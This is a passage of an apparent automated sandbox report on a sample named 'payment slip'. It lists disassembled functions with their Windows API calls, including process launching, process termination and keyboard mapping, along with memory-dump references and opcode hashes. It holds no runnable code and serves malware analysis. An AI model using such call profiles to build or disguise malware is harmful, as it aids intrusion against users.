                                        • Opcode Fuzzy Hash: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                        • Instruction Fuzzy Hash: 57119A32604206EFEF109FA5CC49FEEBBB9EB42355F144058F84597220C739A940EB60
                                        Function 000914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00091506
                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
                                        • CloseHandle.KERNEL32(00000004), ref: 00091520
                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                        • String ID:
                                        • API String ID: 1413079979-0
                                        • Opcode ID: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                        • Instruction ID: e0e0519a718c4bcd2fdf7093feaa0ee62edd3b42f16e3935530ea7ca74711e36
                                        • Opcode Fuzzy Hash: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                        • Instruction Fuzzy Hash: 8D11297260024AEBEF118F98ED49FDE7BA9FF48744F154115FA09A2060C375CE61EB60
                                        Function 00053382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00053379,00052FE5), ref: 00053390
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0005339E
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000533B7
                                        • SetLastError.KERNEL32(00000000,?,00053379,00052FE5), ref: 00053409
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: bba0d9b5e0e3d4cbc6841b41330d0b4aacb987d327acfa27051ab1c8ec5e2ba5
                                        • Instruction ID: cea13594802ff829677e8b4cf21a98ea1902eabdaf47cef0922292eaa048adc5
                                        • Opcode Fuzzy Hash: bba0d9b5e0e3d4cbc6841b41330d0b4aacb987d327acfa27051ab1c8ec5e2ba5
                                        • Instruction Fuzzy Hash: 7801F532609315AEF72527747D8ADA72A94DB053FB320422DFD10851F1EF154E0AA548
                                        Function 00062D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00065686,00073CD6,?,00000000,?,00065B6A,?,?,?,?,?,0005E6D1,?,000F8A48), ref: 00062D78
                                        • _free.LIBCMT ref: 00062DAB
                                        • _free.LIBCMT ref: 00062DD3
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DE0
                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DEC
                                        • _abort.LIBCMT ref: 00062DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                        • Instruction ID: d2e89997e129d24fcf63bf3b3af217df9c8b94417d26b27c0d4dbfc57664b319
                                        • Opcode Fuzzy Hash: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                        • Instruction Fuzzy Hash: D9F0C831A05E0127E2622734BC16EAE259BAFC27A1F260418F928961D3EF2889015270
                                        Function 000C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                          • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                          • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 000C8A4E
                                        • LineTo.GDI32(?,00000003,00000000), ref: 000C8A62
                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 000C8A70
                                        • LineTo.GDI32(?,00000000,00000003), ref: 000C8A80
                                        • EndPath.GDI32(?), ref: 000C8A90
                                        • StrokePath.GDI32(?), ref: 000C8AA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                        • Instruction ID: 37bc52b5127a5d8e3340a82d4ea5b1a9e91207618819996dcb33d18f6d579dd7
                                        • Opcode Fuzzy Hash: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                        • Instruction Fuzzy Hash: 38110576400108FFEB129F90DC88EAA7FACEB08354F048426FA599A1A1C7759D95DFA0
                                        Function 000951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00095218
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00095229
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00095230
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00095238
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0009524F
                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00095261
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                        • Instruction ID: edf96cbd0c39c1b155ecddcd1aa4c1bfda6ab6dc44ba9fe89e4bc84296aea43d
                                        • Opcode Fuzzy Hash: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                        • Instruction Fuzzy Hash: BE018475A01704BBFF105BA6DC49E5EBFB8FF44351F044065FA08A7291D6709800CB60
                                        Function 00031BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                        • Instruction ID: c994b5c1d497d3badb4c738d8099a54303410683415b32105acff3db0e0d8823
                                        • Opcode Fuzzy Hash: a9f242545921ae80d2b34ba0c21787a4405b1a36686a66d0a18deddde3371c08
                                        • Instruction Fuzzy Hash: 5A0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                        Function 0009EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0009EB30
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0009EB46
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0009EB55
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB64
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB6E
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                        • Instruction ID: 71825f32cf350f8b7d3d547511659a5db09fbaa9b29554a8494b1c13ba8944ae
                                        • Opcode Fuzzy Hash: 62333c02c6702ca1f5b4d46bd6110d6e573db820fbb1e590ad075e1d1413b195
                                        • Instruction Fuzzy Hash: 7EF01772640158BBF7215B62DD0EEAB3A7CEBCAB15F000158FA05D109197A85A0186B5
                                        Function 00087439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?), ref: 00087452
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00087469
                                        • GetWindowDC.USER32(?), ref: 00087475
                                        • GetPixel.GDI32(00000000,?,?), ref: 00087484
                                        • ReleaseDC.USER32(?,00000000), ref: 00087496
                                        • GetSysColor.USER32(00000005), ref: 000874B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                        • Instruction ID: 6f45634a6fb610d7caa3f9d0d4593984f6dc47b25b5cf0a9e167fa47ee43c963
                                        • Opcode Fuzzy Hash: 7d608743df47ba7620da86117da3cdd53f12d0eea6d2686c326672f6d2d8b28e
                                        • Instruction Fuzzy Hash: FA018B31400615EFFB50AFA4DC08FAE7BB5FB04321F240064F959A20A1CB355E82AB10
                                        Function 00091874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0009187F
                                        • UnloadUserProfile.USERENV(?,?), ref: 0009188B
                                        • CloseHandle.KERNEL32(?), ref: 00091894
                                        • CloseHandle.KERNEL32(?), ref: 0009189C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 000918A5
                                        • HeapFree.KERNEL32(00000000), ref: 000918AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                        • Instruction ID: f036e55c47305fb57bc45ca9b0e81be0344b669963981dadb8502f2afb96e6b0
                                        • Opcode Fuzzy Hash: facb89ec12ab216342231937769491057db082d3d679a02333b643408e72092b
                                        • Instruction Fuzzy Hash: 9BE01A36404501BFFB015FA2ED0CD0ABF39FF4AB22B108220F62981470CB369420DF50
                                        Function 0009C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C6EE
                                        • _wcslen.LIBCMT ref: 0009C735
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C79C
                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0009C7CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default
                                        • String ID: 0
                                        • API String ID: 1227352736-4108050209
                                        • Opcode ID: beeef74ba9599ebf33af42cf76b90622784205630c956e6d80e372af280e0d39
                                        • Instruction ID: f4bc7ad02b7b4d24b936be140614355d17619289acdbf9383f24fae1fecd539e
                                        • Opcode Fuzzy Hash: beeef74ba9599ebf33af42cf76b90622784205630c956e6d80e372af280e0d39
                                        • Instruction Fuzzy Hash: 66510371A083019BEB509F68C885FABB7E8AF49314F04092DF995D31E1DB74D904EB52
                                        Function 000BAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 000BAEA3
                                          • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                        • GetProcessId.KERNEL32(00000000), ref: 000BAF38
                                        • CloseHandle.KERNEL32(00000000), ref: 000BAF67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                        • String ID: <$@
                                        • API String ID: 146682121-1426351568
                                        • Opcode ID: 8c46d4925fbfd18b2ca66ab63ebf854d327496781cca8d466fffe2a1c8975716
                                        • Instruction ID: 5c34fd495a52dcafe86060aeff5ac585d7d4828d51d0938e65d4d78c4b78a461
                                        • Opcode Fuzzy Hash: 8c46d4925fbfd18b2ca66ab63ebf854d327496781cca8d466fffe2a1c8975716
                                        • Instruction Fuzzy Hash: 46715571A00619DFCB15DF94C484ADEBBF4BF09314F0484A9E85AAB3A2CB74ED45CB91
                                        Function 000C6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(00E1E670,?), ref: 000C62E2
                                        • ScreenToClient.USER32(?,?), ref: 000C6315
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 000C6382
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID: U
                                        • API String ID: 3880355969-2399391058
                                        • Opcode ID: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                        • Instruction ID: ab0ce2fea6f6f1fddf5e3ef4e073f18c9d6a11bc13c14e60efa816a012c119b5
                                        • Opcode Fuzzy Hash: 889c98171c8136d8c5efb7380aad6016e9270beb11f815b6181843ad178da9a8
                                        • Instruction Fuzzy Hash: 4C514A70A00649AFDB20DF68D980EAE7BF5EB45360F10826DF8559B2A1D731AE81CB50
                                        Function 0009719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00097206
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0009723C
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0009724D
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000972CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                        • Instruction ID: 2c87bd64bb4d5f2af65b8c79ea4e0f53eb747df96d5298733aa2de7012e7e6bd
                                        • Opcode Fuzzy Hash: c0a172c70f9b0e3d89e55171a2dcd6a761f0f9debb0d81bf49c8d9ea44842ef0
                                        • Instruction Fuzzy Hash: 7141AF72624204EFDF25CF54C884A9A7BA9EF45710F2480ADFD099F24AD7B1DD40EBA0
                                        Function 000C52C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 000C5352
                                        • GetWindowLongW.USER32(?,000000F0), ref: 000C5375
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C5382
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C53A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID: U
                                        • API String ID: 3340791633-2399391058
                                        • Opcode ID: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                        • Instruction ID: 6b086df7715d862ea9fae2cce252366979d28267ed05fe02aaafc807145ae4e0
                                        • Opcode Fuzzy Hash: eb063d5704efe806c980da6b655c440f4e12b193fdc8fd0d479d3d0183af9edd
                                        • Instruction Fuzzy Hash: 7031B238B55A88AFEB709B14CC05FEC77A5AB04392F58410AFA51961E2C7B4BBC09B41
                                        Function 000C7674 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 000C769A
                                        • GetWindowRect.USER32(?,?), ref: 000C7710
                                        • PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                        • MessageBeep.USER32(00000000), ref: 000C778C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID: U
                                        • API String ID: 1352109105-2399391058
                                        • Opcode ID: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                        • Instruction ID: eaa1fb6d56119dc77ba2f80312ce49cfc3893fc71c19094aabfbcb89a3fef6fb
                                        • Opcode Fuzzy Hash: 14af9ab6cd3e6dcc0161762e49419115f5c5b76f942ace82172e09d0f6da11aa
                                        • Instruction Fuzzy Hash: 9A419C34609218AFDB51CF68C898FAD77F4BB48304F1882ACE4589B2A1C374A981CF90
                                        Function 000C4653 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 000C4705
